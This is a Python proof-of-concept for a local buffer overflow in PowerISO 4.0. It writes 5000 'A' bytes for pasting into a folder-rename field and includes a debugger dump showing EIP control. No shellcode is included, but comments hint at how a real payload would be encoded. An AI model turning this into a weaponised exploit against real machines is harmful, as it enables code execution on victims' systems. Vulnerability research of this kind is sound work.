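#!/usr/bin/env python
####################################################################################
#
# Poweriso 4.0 Local Buffer Overflow PoC
# Found By: Dr_IDE
# Tested On: XPSP3
# Usage: Create New ISO, Add a New Folder, Paste to Rename Folder, Click Save
# Notes: This must have been fixed somewhere between 4.0 and 4.7
#
# How the PoC works: the script writes a file of 5000 "A" (0x41) bytes; the
# tester copies that text to the clipboard and pastes it into the folder-name
# field.  Saving the ISO overflows a fixed-size buffer and the fill pattern
# lands in EIP (0x41414141 in the dump below), with ESP pointing into the
# attacker-controlled string.  No shellcode is included -- this is a crash /
# EIP-control demonstration only.  Run it in an isolated VM against the
# vulnerable 4.0 build; later builds (4.7) reportedly no longer crash.
#
####################################################################################
'''
Crash dump captured in the debugger (the "A" runs are truncated here):

EAX 00ADDDC0
ECX 00000000
EDX 00004000
EBX 00000000
ESP 0211FA6C ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]AAAAAAAAAAAA~0"
EBP 00000000
ESI 0211FA20
EDI 00ADC2F0 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]AAAAAAAAAAAAAAAA"
EIP 41414141
C 0  ES 0023 32bit 0(FFFFFFFF)
P 0  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 0  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFD5000(FFF)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_SUCCESS (00000000)
EFL 00000202 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty +UNORM 3C0A 0012EBE8 00000000
ST1 empty -UNORM F674 00000000 0000000C
ST2 empty 3.3165366670546675450e-4932
ST3 empty 0.0000000000019151440e-4933
ST4 empty 3.3165367202851109490e-4932
ST5 empty +UNORM 0001 0012F674 00000000
ST6 empty +UNORM 000C 000B0418 7E418734
ST7 empty -UNORM ABCD 7E43E577 0012F674
               3 2 1 0      E S P U O Z D I
FST 0000  Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)
FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1
'''

# Shellcode must be Alpha Upper (per the original author: the rename field
# only keeps upper-case alphanumeric bytes, so a real payload would need an
# upper-case alphanumeric encoder).  This PoC deliberately ships none.

# 5000 bytes of 0x41 is enough to reach and overwrite EIP (see dump above).
PAYLOAD_LENGTH = 5000
FILL_BYTE = "\x41"
OUTPUT_FILE = "poweriso.txt"


def build_payload(length=PAYLOAD_LENGTH, fill=FILL_BYTE):
    """Return the crash string: ``length`` repetitions of ``fill``.

    ``fill`` should stay printable and newline-free: the file is written in
    text mode and its contents are pasted into a GUI text field, so a
    newline would be translated on Windows and would end the folder name.
    """
    return fill * length


def write_payload(path=OUTPUT_FILE, payload=None):
    """Write ``payload`` (default: ``build_payload()``) to ``path``.

    Returns the number of characters written.  The file is opened with a
    context manager so the handle is closed even if the write fails.
    """
    if payload is None:
        payload = build_payload()
    with open(path, "w") as f1:
        f1.write(payload)
    return len(payload)


# Kept as a module-level name for parity with the original script.
buff = build_payload()

if __name__ == "__main__":
    write_payload(OUTPUT_FILE, buff)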